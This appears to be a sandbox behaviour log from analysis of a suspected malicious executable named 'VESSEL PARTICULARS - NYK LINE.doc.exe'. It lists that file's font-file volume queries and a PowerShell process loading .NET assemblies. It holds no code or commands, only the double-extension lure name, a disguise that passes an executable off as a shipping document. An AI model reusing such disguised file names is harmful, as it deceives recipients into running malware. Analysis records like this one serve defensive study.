                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
